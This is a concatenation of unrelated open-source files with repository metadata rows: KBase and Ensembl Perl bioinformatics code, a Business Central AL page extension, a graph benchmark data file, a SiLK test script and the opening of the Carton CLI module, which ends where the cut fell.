#THIS FILE HAS 2 columns (tab delimited)
#the first column is the GPL_ID
#the second column is the KBase Platform ID (if it exists)
open (GPL_RESULTS,$gpl_results_file) or return "0 - Unable to open $gpl_results_file , it was supposed to exist";
my @gpl_results_lines = (<GPL_RESULTS>);
foreach my $gpl_result_line (@gpl_results_lines)
{
my ($gpl_id,$kbase_id) = split('\t',trim($gpl_result_line));
if ((trim($kbase_id) ne '') && (trim($gpl_id) ne ''))
{
$return_hash{$gpl_id} = trim($kbase_id);
}
}
close(GPL_RESULTS);
}
return %return_hash;
}
sub get_processed_gsm_hash
{
my $gsm_results_file = shift;
#returns a hash key gsm_id => {genome => {data_quality_level => value kb|sample}}.#
my %return_hash;
if (-e $gsm_results_file)
{
#THIS FILE HAS 5 columns (tab delimited)(only 4 are brought back for this hash)
#the first column is the GSM_ID
#the second column is the Genome (kbase genome id)
#the third column is the DataQualityLevel (currently 3 possible int values -
# "1" for kbase pipeline processed data, "2" for seq blat mapped geo data, "3" for synonym mapped geo data
#the fourth column is the KBase Sample ID (if it exists)
#the fifth column is the warning and error messages (separated by "___", 3 underscores)
open (GSM_RESULTS,$gsm_results_file) or return "0 - Unable to open $gsm_results_file , it was supposed to exist";
my @gsm_results_lines = (<GSM_RESULTS>);
foreach my $gsm_result_line (@gsm_results_lines)
{
my ($gsm_id,$genome_id, $dql, $kbase_id,$messages) = split('\t',trim($gsm_result_line));
if ((trim($kbase_id) ne '') && (trim($gsm_id) ne '') && (trim($genome_id) ne '') && (trim($dql) ne ''))
{
$return_hash{$gsm_id}{$genome_id}{$dql} = trim($kbase_id);
}
}
close(GSM_RESULTS);
}
return %return_hash;
}
sub create_sample_genome_hash
{
my $gsm_results_file = shift;
#returns a hash key sample_id => genome
my %return_hash;
if (-e $gsm_results_file)
{
#THIS FILE HAS 5 columns (tab delimited)(only 4 are brought back for this hash)
#the first column is the GSM_ID
#the second column is the Genome (kbase genome id)
#the third column is the DataQualityLevel (currently 3 possible int values -
# "1" for kbase pipeline processed data, "2" for seq blat mapped geo data, "3" for synonym mapped geo data
#the fourth column is the KBase Sample ID (if it exists)
#the fifth column is the warning and error messages (separated by "___", 3 underscores)
open (GSM_RESULTS,$gsm_results_file) or return "0 - Unable to open $gsm_results_file , it was supposed to exist";
my @gsm_results_lines = (<GSM_RESULTS>);
foreach my $gsm_result_line (@gsm_results_lines)
{
my ($gsm_id,$genome_id, $dql, $kbase_id,$messages) = split('\t',trim($gsm_result_line));
if ((trim($kbase_id) ne '') && (trim($genome_id) ne ''))
{
$return_hash{trim($kbase_id)}=trim($genome_id);
}
}
close(GSM_RESULTS);
}
return %return_hash;
}
sub add_series_ids_to_samples
{
my $typed_objects_directory = shift;
my $sample_id = shift;
my $series_id = shift;
my %kb_series_ids;
$kb_series_ids{$series_id} = 1;
my $temp_sample_file_name = $sample_id;
$temp_sample_file_name =~ s/kb\|//;
my $sample_file_name = $typed_objects_directory."/".$temp_sample_file_name;
open (JSON_FILE,$sample_file_name) or die "0 - Unable to open $sample_file_name, it was supposed to exist";
my ($json_result,@temp_array)= (<JSON_FILE>);
close(JSON_FILE);
my $perl_object = from_json($json_result);
if ($perl_object->{"expression_series_ids"})
{
my @old_series_ids = @{$perl_object->{"expression_series_ids"}};
foreach my $old_series_id (@old_series_ids)
{
$kb_series_ids{$old_series_id} = 1;
}
}
my @new_series_ids = sort(keys(%kb_series_ids));
$perl_object->{"expression_series_ids"} = \@new_series_ids;
open(SAMPLE_FILE, ">".$sample_file_name) or return "0 - Unable to make to $sample_file_name \n";
print SAMPLE_FILE to_json($perl_object);
close(SAMPLE_FILE);
return 1;
}
1;
| 41.455993 | 173 | 0.600407 |
73e5137fe1859205da527500c7f7f6b9d1ddd9c3 | 1,075 | al | Perl | Apps/CZ/CoreLocalizationPack/app/Src/PageExtensions/ServiceQuote.PageExt.al | bjarkihall/ALAppExtensions | d8243d27e0280dec6e079ab9f1e838f9768c208c | [
"MIT"
] | 1 | 2021-08-16T18:14:49.000Z | 2021-08-16T18:14:49.000Z | Apps/CZ/CoreLocalizationPack/app/Src/PageExtensions/ServiceQuote.PageExt.al | bjarkihall/ALAppExtensions | d8243d27e0280dec6e079ab9f1e838f9768c208c | [
"MIT"
] | null | null | null | Apps/CZ/CoreLocalizationPack/app/Src/PageExtensions/ServiceQuote.PageExt.al | bjarkihall/ALAppExtensions | d8243d27e0280dec6e079ab9f1e838f9768c208c | [
"MIT"
] | 1 | 2021-02-09T10:23:09.000Z | 2021-02-09T10:23:09.000Z | pageextension 11761 "Service Quote CZL" extends "Service Quote"
{
layout
{
addafter("VAT Registration No.")
{
field("Registration No. CZL"; Rec."Registration No. CZL")
{
ApplicationArea = Basic, Suite;
ToolTip = 'Specifies the registration number of customer.';
}
field("Tax Registration No. CZL"; Rec."Tax Registration No. CZL")
{
ApplicationArea = Basic, Suite;
ToolTip = 'Specifies the secondary VAT registration number for the customer.';
Importance = Additional;
}
}
addafter("Area")
{
field("EU 3-Party Intermed. Role CZL"; Rec."EU 3-Party Intermed. Role CZL")
{
ApplicationArea = Basic, Suite;
ToolTip = 'Specifies when the service header will use European Union third-party intermediate trade rules. This option complies with VAT accounting standards for EU third-party trade.';
}
}
}
}
| 37.068966 | 201 | 0.554419 |
edb68f3f35113a86adcce82a98dda3e633396fb5 | 14,925 | pm | Perl | modules/Bio/EnsEMBL/IdMapping/SyntenyRegion.pm | Anacode/ensembl | d3cfe97706ed1d38ee6b561198dd592c9f4ea2ee | [
"Apache-2.0"
] | null | null | null | modules/Bio/EnsEMBL/IdMapping/SyntenyRegion.pm | Anacode/ensembl | d3cfe97706ed1d38ee6b561198dd592c9f4ea2ee | [
"Apache-2.0"
] | null | null | null | modules/Bio/EnsEMBL/IdMapping/SyntenyRegion.pm | Anacode/ensembl | d3cfe97706ed1d38ee6b561198dd592c9f4ea2ee | [
"Apache-2.0"
] | null | null | null | =head1 LICENSE
Copyright [1999-2013] Wellcome Trust Sanger Institute and the EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=cut
=head1 CONTACT
Please email comments or questions to the public Ensembl
developers list at <dev@ensembl.org>.
Questions may also be sent to the Ensembl help desk at
<helpdesk@ensembl.org>.
=cut
=head1 NAME
Bio::EnsEMBL::IdMapping::SyntenyRegion - object representing syntenic regions
=head1 SYNOPSIS
# create a new SyntenyRegion from a source and a target gene
my $sr = Bio::EnsEMBL::IdMapping::SyntenyRegion->new_fast( [
$source_gene->start, $source_gene->end,
$source_gene->strand, $source_gene->seq_region_name,
$target_gene->start, $target_gene->end,
$target_gene->strand, $target_gene->seq_region_name,
$entry->score,
] );
# merge with another SyntenyRegion
my $merged_sr = $sr->merge($sr1);
# score a gene pair against this SyntenyRegion
my $score =
$sr->score_location_relationship( $source_gene1, $target_gene1 );
=head1 DESCRIPTION
This object represents a synteny between a source and a target location.
SyntenyRegions are built from mapped genes, and the their score is
defined as the score of the gene mapping. For merged SyntenyRegions,
scores are combined.
=head1 METHODS
new_fast
source_start
source_end
source_strand
source_seq_region_name
target_start
target_end
target_strand
target_seq_region_name
score
merge
stretch
score_location_relationship
to_string
=cut
package Bio::EnsEMBL::IdMapping::SyntenyRegion;
use strict;
use warnings;
no warnings 'uninitialized';
use Bio::EnsEMBL::Utils::Exception qw(throw warning);
=head2 new_fast
Arg[1] : Arrayref $array_ref - the arrayref to bless into the
SyntenyRegion object
Example : my $sr = Bio::EnsEMBL::IdMapping::SyntenyRegion->new_fast([
]);
Description : Constructor. On instantiation, source and target regions are
reverse complemented so that source is always on forward strand.
Return type : a Bio::EnsEMBL::IdMapping::SyntenyRegion object
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub new_fast {
my $class = shift;
my $array_ref = shift;
# reverse complement source and target so that source is always on forward
# strand; this will make merging and other comparison operations easier
# at later stages
if ($array_ref->[2] == -1) {
$array_ref->[2] = 1;
$array_ref->[6] = -1 * $array_ref->[6];
}
return bless $array_ref, $class;
}
=head2 source_start
Arg[1] : (optional) Int - source location start coordinate
Description : Getter/setter for source location start coordinate.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub source_start {
my $self = shift;
$self->[0] = shift if (@_);
return $self->[0];
}
=head2 source_end
Arg[1] : (optional) Int - source location end coordinate
Description : Getter/setter for source location end coordinate.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub source_end {
my $self = shift;
$self->[1] = shift if (@_);
return $self->[1];
}
=head2 source_strand
Arg[1] : (optional) Int - source location strand
Description : Getter/setter for source location strand.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub source_strand {
my $self = shift;
$self->[2] = shift if (@_);
return $self->[2];
}
=head2 source_seq_region_name
Arg[1] : (optional) String - source location seq_region name
Description : Getter/setter for source location seq_region name.
Return type : String
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub source_seq_region_name {
my $self = shift;
$self->[3] = shift if (@_);
return $self->[3];
}
=head2 target_start
Arg[1] : (optional) Int - target location start coordinate
Description : Getter/setter for target location start coordinate.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub target_start {
my $self = shift;
$self->[4] = shift if (@_);
return $self->[4];
}
=head2 target_end
Arg[1] : (optional) Int - target location end coordinate
Description : Getter/setter for target location end coordinate.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub target_end {
my $self = shift;
$self->[5] = shift if (@_);
return $self->[5];
}
=head2 target_strand
Arg[1] : (optional) Int - target location strand
Description : Getter/setter for target location strand.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub target_strand {
my $self = shift;
$self->[6] = shift if (@_);
return $self->[6];
}
=head2 target_seq_region_name
Arg[1] : (optional) String - target location seq_region name
Description : Getter/setter for target location seq_region name.
Return type : String
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub target_seq_region_name {
my $self = shift;
$self->[7] = shift if (@_);
return $self->[7];
}
=head2 score
Arg[1] : (optional) Float - score
Description : Getter/setter for the score between source and target location.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub score {
my $self = shift;
$self->[8] = shift if (@_);
return $self->[8];
}
=head2 merge
Arg[1] : Bio::EnsEMBL::IdMapping::SyntenyRegion $sr - another
SyntenyRegion
Example : $merged_sr = $sr->merge($other_sr);
Description : Merges two overlapping SyntenyRegions if they meet certain
criteria (see documentation in the code for details). Score is
calculated as a combined distance score. If the two
SyntenyRegions aren't mergeable, this method returns undef.
Return type : Bio::EnsEMBL::IdMapping::SyntenyRegion or undef
Exceptions : warns on bad scores
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub merge {
my ($self, $sr) = @_;
# must be on same seq_region
if ($self->source_seq_region_name ne $sr->source_seq_region_name or
$self->target_seq_region_name ne $sr->target_seq_region_name) {
return 0;
}
# target must be on same strand
return 0 unless ($self->target_strand == $sr->target_strand);
# find the distance of source and target pair and compare
my $source_dist = $sr->source_start - $self->source_start;
my $target_dist;
if ($self->target_strand == 1) {
$target_dist = $sr->target_start - $self->target_start;
} else {
$target_dist = $self->target_end - $sr->target_end;
}
# prevent division by zero error
if ($source_dist == 0 or $target_dist == 0) {
warn("WARNING: source_dist ($source_dist) and/or target_dist ($target_dist) is zero.\n");
return 0;
}
# calculate a distance score
my $dist = $source_dist - $target_dist;
$dist = -$dist if ($dist < 0);
my $d1 = $dist/$source_dist;
$d1 = -$d1 if ($d1 < 0);
my $d2 = $dist/$target_dist;
$d2 = -$d2 if ($d2 < 0);
my $dist_score = 1 - $d1 - $d2;
# distance score must be more than 50%
return 0 if ($dist_score < 0.5);
my $new_score = $dist_score * ($sr->score + $self->score)/2;
if ($new_score > 1) {
warn("WARNING: Bad merge score: $new_score\n");
}
# extend SyntenyRegion to cover both sources and targets, set merged score
# and return
if ($sr->source_start < $self->source_start) {
$self->source_start($sr->source_start);
}
if ($sr->source_end > $self->source_end) {
$self->source_end($sr->source_end);
}
if ($sr->target_start < $self->target_start) {
$self->target_start($sr->target_start);
}
if ($sr->target_end > $self->target_end) {
$self->target_end($sr->target_end);
}
$self->score($new_score);
return $self;
}
=head2 stretch
Arg[1] : Float $factor - stretching factor
Example : $stretched_sr = $sr->stretch(2);
Description : Extends this SyntenyRegion to span a $factor * $score more area.
Return type : Bio::EnsEMBL::IdMapping::SyntenyRegion
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub stretch {
my ($self, $factor) = @_;
my $source_adjust = int(($self->source_end - $self->source_start + 1) *
$factor * $self->score);
$self->source_start($self->source_start - $source_adjust);
$self->source_end($self->source_end + $source_adjust);
#warn sprintf(" sss %d %d %d\n", $source_adjust, $self->source_start,
# $self->source_end);
my $target_adjust = int(($self->target_end - $self->target_start + 1) *
$factor * $self->score);
$self->target_start($self->target_start - $target_adjust);
$self->target_end($self->target_end + $target_adjust);
return $self;
}
=head2 score_location_relationship
Arg[1] : Bio::EnsEMBL::IdMapping::TinyGene $source_gene - source gene
Arg[2] : Bio::EnsEMBL::IdMapping::TinyGene $target_gene - target gene
Example : my $score = $sr->score_location_relationship($source_gene,
$target_gene);
Description : This function calculates how well the given source location
interpolates on given target location inside this SyntenyRegion.
Scoring is done the following way: Source and target location
are normalized with respect to this Regions source and target.
Source range will then be somewhere close to 0.0-1.0 and target
range anything around that.
The extend of the covered area between source and target range
is a measurement of how well they agree (smaller extend is
better). The extend (actually 2*extend) is reduced by the size
of the regions. This will result in 0.0 if they overlap
perfectly and bigger values if they dont.
This is substracted from 1.0 to give the score. The score is
likely to be below zero, but is cut off at 0.0f.
Finally, the score is multiplied with the score of the synteny
itself.
Return type : Float
Exceptions : warns if score out of range
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub score_location_relationship {
my ($self, $source_gene, $target_gene) = @_;
# must be on same seq_region
if (($self->source_seq_region_name ne $source_gene->seq_region_name) or
($self->target_seq_region_name ne $target_gene->seq_region_name)) {
return 0;
}
# strand relationship must be the same (use logical XOR to find out)
if (($self->source_strand == $source_gene->strand) xor
($self->target_strand == $target_gene->strand)) {
return 0;
}
# normalise source location
my $source_rel_start = ($source_gene->start - $self->source_start) /
($self->source_end - $self->source_start + 1);
my $source_rel_end = ($source_gene->end - $self->source_start + 1) /
($self->source_end - $self->source_start + 1);
#warn " aaa ".$self->to_string."\n";
#warn sprintf(" bbb %.6f %.6f\n", $source_rel_start, $source_rel_end);
# cut off if the source location is completely outside
return 0 if ($source_rel_start > 1.1 or $source_rel_end < -0.1);
# normalise target location
my ($target_rel_start, $target_rel_end);
my $t_length = $self->target_end - $self->target_start + 1;
if ($self->target_strand == 1) {
$target_rel_start = ($target_gene->start - $self->target_start) / $t_length;
$target_rel_end = ($target_gene->end - $self->target_start + 1) / $t_length;
} else {
$target_rel_start = ($self->target_end - $target_gene->end) / $t_length;
$target_rel_end = ($self->target_end - $target_gene->start + 1) / $t_length;
}
my $added_range = (($target_rel_end > $source_rel_end) ? $target_rel_end :
$source_rel_end) -
(($target_rel_start < $source_rel_start) ? $target_rel_start :
$source_rel_start);
my $score = $self->score * (1 - (2 * $added_range - $target_rel_end -
$source_rel_end + $target_rel_start + $source_rel_start));
#warn " ccc ".sprintf("%.6f:%.6f:%.6f:%.6f:%.6f\n", $added_range,
# $source_rel_start, $source_rel_end, $target_rel_start, $target_rel_end);
$score = 0 if ($score < 0);
# sanity check
if ($score > 1) {
warn "Out of range score ($score) for ".$source_gene->id.":".
$target_gene->id."\n";
}
return $score;
}
=head2 to_string
Example : print LOG $sr->to_string, "\n";
Description : Returns a string representation of the SyntenyRegion object.
Useful for debugging and logging.
Return type : String
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub to_string {
my $self = shift;
return sprintf("%s:%s-%s:%s %s:%s-%s:%s %.6f",
$self->source_seq_region_name,
$self->source_start,
$self->source_end,
$self->source_strand,
$self->target_seq_region_name,
$self->target_start,
$self->target_end,
$self->target_strand,
$self->score
);
}
1;
| 27.741636 | 100 | 0.653333 |
ed22f3b9c9eb457ba7c62d91acbec9fec94cf294 | 6,624 | al | Perl | benchmark/benchmarks/FASP-benchmarks/data/small-world-2/smallworld2-0744-40-360-1438.al | krzysg/FaspHeuristic | 1929c40e3fbc49e68b04acfc5522539a18758031 | [
"MIT"
] | null | null | null | benchmark/benchmarks/FASP-benchmarks/data/small-world-2/smallworld2-0744-40-360-1438.al | krzysg/FaspHeuristic | 1929c40e3fbc49e68b04acfc5522539a18758031 | [
"MIT"
] | null | null | null | benchmark/benchmarks/FASP-benchmarks/data/small-world-2/smallworld2-0744-40-360-1438.al | krzysg/FaspHeuristic | 1929c40e3fbc49e68b04acfc5522539a18758031 | [
"MIT"
] | null | null | null | 1 7 57 172 242 265
3 56 77 85 134 135 355
4 49 163 165 204 209 255
5 120 145
6 76 100 178 250 264
7 1 242
8 28 94 116 243 260 288
9 102 268 326 347
10 89 250
11 108 130 157
12 10 15 21 74 94 108 222 336
13 59 84 195 227 274
14 154 192 239 359
15 10 60 91 277
16 1 121 324
17 158 230 326 329
18 23 75 157 169
19 36 73 116 158 221 267
20 50 93 218
21 47 75 182 205 242 339
22 209 268
23 18 72 254
24 97 139 253 323
25 63 176 334
26 148 260 312
27 4 8 43 62 136 237 283
28 189 197 288
29 168 262 319
30 114 195 213 229 231 236
31 111 171 275
32 236 259 336 358
33 10 113 149 250 331
34 6 127
35 276 298 337
36 16 222 229 282 310 350
37 10 159 212 225 343
38 87 125 144 157
39 30 42 110 325
40 94 123 243
41 17 168 256 281 304
42 212 347
43 57 103 132 292 299 337 359
44 61 82 166 181 187
45 39 154 188 193 201 266
46 70 191 227
47 3 161 266 270
48 72 298
50 52 182 285
51 81 89 188
52 48 97 129 176 208 256 355
53 41 202 330 356
54 59 78 233 320 328
55 44 206
56 92 352
57 7 136
58 47 200 204 262 333
59 26 294 359
60 10 29 62 202 244
61 14 137 137 161 285 308 350
62 33 41 42 229 267 289 300 300 356
63 27 94 127 150 333
64 103 116 273 353
65 129 180 193 229
66 127
67 87 165 171 187 307
68 20 254
69 86 217 260 297
70 24 106 283 333
71 100 132 164 233
72 30 109 115 235 253
73 90 106 181 231 277 293
74 216
75 21 92 241 298 350
76 97 213 214 217 253 341 354
77 19 195 296 343 360
78 25 212
79 74 129 271
80 92 98 293 318
81 18 65 124 308
82 79 90 169 220 291 311
83 64
84 128 218
85 11 76 100 135 141 157 217 232
86 115 132 192 207 211 272 299
87 22 96 169 211 303 328
88 133 321
89 59 85 216 284
90 5 79 124 322
91 155 184 328
92 120 136 151 268 293 302
93 87 101 153 156 180
94 119 182 220
95 26 70 123 165 280
96 34 79 166 186 191 198
97 47 60 230 245 264 358
98 208 243 293
99 3 162 240 292 301
100 85 102 107 151 220 318 324
101 216 237 315 348
102 280 328
103 138 235 340
104 26 30 51 111
105 39 191 207
106 19 73 158 255 275 287
107 85
108 175 247
109 15 243 285
110 40 139 255 304
111 87
112 55 103 206 213 222 235 291 340
113 108 114 118 284 294
114 107 215
115 70 74 297
116 233 242
117 18 32 99
118 125 149 232
119 13 48 101 117
120 11 47 179
121 16 57 90 125 139
122 18 46 169 338
123 83 95 133
124 44 338
125 86 207
126 101 161 205 319 344
127 4 34 75
128 26 161 168
129 73 88 287
130 196 265 321
131 35 124 226 338
132 34 77 322
133 29 37 90 95 193 313 325
134 106 249 267
135 85
136 17 27 89 98 100 308
137 77 81 121 279 360
138 10 31 39 122 201 248
139 104 125 143 232 323
140 72 167 217
141 123 294
142 130
144 99 137 301 317 325 355
145 100 127 136 273 351
146 278
147 1 100 113 278 342 343
148 6 174 203 309 317
149 32 50 172
150 40 63 190 220
151 176 357
152 85 225
153 70 135 170 217 264 325
154 133 283 307
155 48 204 206 214 310 313
156 109 280 286 288
157 113 216
158 1 50 149 185 252 257
159 37 140 289
160 5 36 211 318 337 358
161 22 216 217
162 11 259
163 10 16 17 41 42 62 182
164 16 146 172 172 274 298 349
165 203 277
166 46 65 77
167 173 196 291
168 48 98 132 244
169 122 247 310
170 159 286
171 31 165 200 228 266
172 38 139 164 218 267 358
173 89 140 213 271
174 31 169
176 19 71 129 260 353
177 96 97 102 105 220
178 34 45 313 354
179 24 25 83 171 231 233
180 120 148 189 243
181 37 147 172
182 1 20 101 213 237 319
183 91 116 137 237
184 69 91 164
185 34 38 87 162 188 199 216
186 14 107 146 168 181
187 10 128 129 169 212
188 129 137 177 228 292 330
189 93 116 180 347
190 153 216 300 314
191 149 227
192 70
193 154 201
194 65 94 124 327 340
195 60 60 62 335 339
196 54 142 204
197 15 185 243 245 273 285 293
198 197 331 357
199 64 103 174 285
200 31 194
201 149 191 266
202 15 180 222
203 110 283 305 346
204 143 208 264 355
206 20 67 182 291 301 333
207 253
208 5 31 50 168 300 355 358 360
209 21 125 165 178
210 165 178 305
211 105 258 273 296
212 56 235 272 342 343
213 116 173 177 199 226 238
214 113 119 186 223
215 82 200 212 220
216 40 78 81 83 334
217 153 186 230 328 336
218 178 210 217 234 330
219 10 328 345
220 7 143 215 249
221 158 228 281
222 148 202 265
223 11 141
224 66 76 148 256 257
225 8 227 236
226 105 156 187
227 36 88 98 130 134 160 191 286 348
228 26 96 188
229 62 83
230 28 148 157
231 24 30 213
232 56 135 173 186 285
233 116 235 327
234 51 55 217 219
235 9 68 112 147 277 306
236 5 113 166 223
237 182 248 280
238 8 117 183 274 291
239 61 306 346
240 1 66 102 121 221 260
241 66 89 140 236 257
242 9 199 326 357
243 98 120 163 180 296
244 107 114 168 218 350
245 111 208 210 311
246 53 92 161 321
247 132 257 280
248 39 135
249 55 85 96 211 288 293 303
250 26 264 311 332
251 47 80 173 213
252 117 142 204 244 324
253 69 127 222 234 324
254 14 271 356
255 10 177
256 269
257 22 30 62 141 249
258 17 174 305 327
259 284 335
260 20 180 185 203 279
261 156 191 263 280
262 97 204
263 49 159 192 359
264 34 77 97 99
265 60 91 133
266 183 199 256 325 334
267 40 64 279
268 90 297 303
269 62 183 240 311
270 114 215 220
271 18 103 180 248
272 33 40 80 134 168 301 335
273 172 293
274 96 191 238 340
275 13 84 122 137 225
276 247 261 268 287
277 49 103 254
278 88 147 256 297
279 207
280 71 132 285
281 41 95 254 257 329
282 88 115 131 187 306
283 144 193 250 290 330
284 38 64 84 113 291
285 90 107 150 214
286 83 174 227 276 333
287 1 41 124 252 328
288 8 28 306
289 168 237
290 19 23 181 181 221 224 283
291 69 137
292 180 202 254
293 94 98 126 164
294 51 337
295 99 184 219 338 340
296 151 233 288 292
297 54 72 136 147 285
298 92 191 199 329
299 36 43 93 181 333 359
300 44 195 208 214 245 279 310
301 69 84 113 214 295
302 23 126 126 352
303 146 191 211 268 270
304 9 89 120 165 298 322
305 4 100 218 306
306 86 88 131 290
307 74 122 123 347
308 66 115
309 63 207 222
310 34 148 292 343
311 83 144
312 287
313 133 325
314 45 117 276 293 307 312
315 2 159 275 299
316 1 80 121 166 222 318 328
317 348 352
318 1 57 80 147
319 29 95 218
320 156 206 291 294 348 349
321 123 130 231 232 272
323 24 137 177 231 264
324 82 121 213
326 219 242 262 286 293 347
327 28 169 259 343
328 25 67 166 249 250 278 325 345
329 56 308 334
330 13 15 38 157 161
331 30 106 118 133 139 222
332 232 331 338
333 160 236 309 339
334 7 157 225 312
335 20 38 50
336 87 96 226 236 239 252 331
337 168 254 262 275 324
338 90 184 230 284 295 328
339 41 106 110 175 201 236
340 11 14 49 55 103 266
341 50 196 200 204 234 277
342 171 278 313 331
343 63 94 227 243 342
344 107 147
345 58 237 262
346 195 220 230 290 299 312
347 76 93
348 198 258 349
349 35 182 183 286 325 348
350 25 156 179 236 329
351 69 91 112 212 340 342
352 56 117 119 184 285 345
353 4 105 134 209 279
354 89 351
355 48 52 155 204 348
356 79 160 225 271
357 64 93 141 189 273 306 354
358 311
359 24 217 354
360 38 241 319 | 18.764873 | 36 | 0.729771 |
eda942dd17084deb6f9eba718973fc80d7f51303 | 813 | pl | Perl | silk-src/src/rwsort/tests/rwdedupe-ignore-stime-v6.pl | mjschultz/netsa-pkg | 07bf4ff29a73ebc0f58e4aa27d3ad6b1dee7fc83 | [
"Apache-2.0"
] | 3 | 2018-06-01T06:55:14.000Z | 2021-11-14T22:51:04.000Z | silk-src/src/rwsort/tests/rwdedupe-ignore-stime-v6.pl | mjschultz/netsa-pkg | 07bf4ff29a73ebc0f58e4aa27d3ad6b1dee7fc83 | [
"Apache-2.0"
] | 3 | 2017-07-02T17:03:34.000Z | 2021-09-09T17:05:31.000Z | silk-src/src/rwsort/tests/rwdedupe-ignore-stime-v6.pl | mjschultz/netsa-pkg | 07bf4ff29a73ebc0f58e4aa27d3ad6b1dee7fc83 | [
"Apache-2.0"
] | 4 | 2017-08-14T15:42:31.000Z | 2022-01-24T16:24:27.000Z | #! /usr/bin/perl -w
# MD5: 4d68466b8f35b4cc95929a4bfac81da7
# TEST: ./rwdedupe --ignore-fields=stime ../../tests/data-v6.rwf ../../tests/empty.rwf | ../rwstats/rwuniq --fields=1-5 --ipv6-policy=force --timestamp-format=epoch --values=bytes,packets,records,stime,etime --sort-output --delimited --no-title
use strict;
use SiLKTests;
my $rwdedupe = check_silk_app('rwdedupe');
my $rwuniq = check_silk_app('rwuniq');
my %file;
$file{v6data} = get_data_or_exit77('v6data');
$file{empty} = get_data_or_exit77('empty');
my $cmd = "$rwdedupe --ignore-fields=stime $file{v6data} $file{empty} | $rwuniq --fields=1-5 --ipv6-policy=force --timestamp-format=epoch --values=bytes,packets,records,stime,etime --sort-output --delimited --no-title";
my $md5 = "4d68466b8f35b4cc95929a4bfac81da7";
check_md5_output($md5, $cmd);
| 47.823529 | 244 | 0.725707 |
ed9c71eb31d0cea537739a45a8feefbc7917feec | 10,579 | pm | Perl | lib/Carton/CLI.pm | jtrowe/carton | acc6c1b295ef4d5119fe9978cfca9e754dcb80bb | [
"Artistic-1.0"
] | 181 | 2015-01-08T16:31:40.000Z | 2022-03-16T14:56:44.000Z | lib/Carton/CLI.pm | jtrowe/carton | acc6c1b295ef4d5119fe9978cfca9e754dcb80bb | [
"Artistic-1.0"
] | 104 | 2015-01-08T10:09:23.000Z | 2022-03-03T10:39:46.000Z | lib/Carton/CLI.pm | jtrowe/carton | acc6c1b295ef4d5119fe9978cfca9e754dcb80bb | [
"Artistic-1.0"
] | 50 | 2015-03-06T18:48:25.000Z | 2021-11-26T21:33:31.000Z | package Carton::CLI;
use strict;
use warnings;
use Config;
use Getopt::Long;
use Path::Tiny;
use Try::Tiny;
use Module::CoreList;
use Scalar::Util qw(blessed);
use Carton;
use Carton::Builder;
use Carton::Mirror;
use Carton::Snapshot;
use Carton::Util;
use Carton::Environment;
use Carton::Error;
use constant { SUCCESS => 0, INFO => 1, WARN => 2, ERROR => 3 };
our $UseSystem = 0; # 1 for unit testing
use Class::Tiny {
verbose => undef,
carton => sub { $_[0]->_build_carton },
mirror => sub { $_[0]->_build_mirror },
};
sub _build_mirror {
my $self = shift;
Carton::Mirror->new($ENV{PERL_CARTON_MIRROR} || $Carton::Mirror::DefaultMirror);
}
sub run {
my($self, @args) = @_;
my @commands;
my $p = Getopt::Long::Parser->new(
config => [ "no_ignore_case", "pass_through" ],
);
$p->getoptionsfromarray(
\@args,
"h|help" => sub { unshift @commands, 'help' },
"v|version" => sub { unshift @commands, 'version' },
"verbose!" => sub { $self->verbose($_[1]) },
);
push @commands, @args;
my $cmd = shift @commands || 'install';
my $code = try {
my $call = $self->can("cmd_$cmd")
or Carton::Error::CommandNotFound->throw(error => "Could not find command '$cmd'");
$self->$call(@commands);
return 0;
} catch {
die $_ unless blessed $_ && $_->can('rethrow');
if ($_->isa('Carton::Error::CommandExit')) {
return $_->code || 255;
} elsif ($_->isa('Carton::Error::CommandNotFound')) {
warn $_->error, "\n\n";
$self->cmd_usage;
return 255;
} elsif ($_->isa('Carton::Error')) {
warn $_->error, "\n";
return 255;
}
};
return $code;
}
sub commands {
my $self = shift;
no strict 'refs';
map { s/^cmd_//; $_ }
grep { /^cmd_.*/ && $self->can($_) } sort keys %{__PACKAGE__."::"};
}
sub cmd_usage {
my $self = shift;
$self->print(<<HELP);
Usage: carton <command>
where <command> is one of:
@{[ join ", ", $self->commands ]}
Run carton -h <command> for help.
HELP
}
sub parse_options {
my($self, $args, @spec) = @_;
my $p = Getopt::Long::Parser->new(
config => [ "no_auto_abbrev", "no_ignore_case" ],
);
$p->getoptionsfromarray($args, @spec);
}
sub parse_options_pass_through {
my($self, $args, @spec) = @_;
my $p = Getopt::Long::Parser->new(
config => [ "no_auto_abbrev", "no_ignore_case", "pass_through" ],
);
$p->getoptionsfromarray($args, @spec);
# with pass_through keeps -- in args
shift @$args if $args->[0] && $args->[0] eq '--';
}
sub printf {
my $self = shift;
my $type = pop;
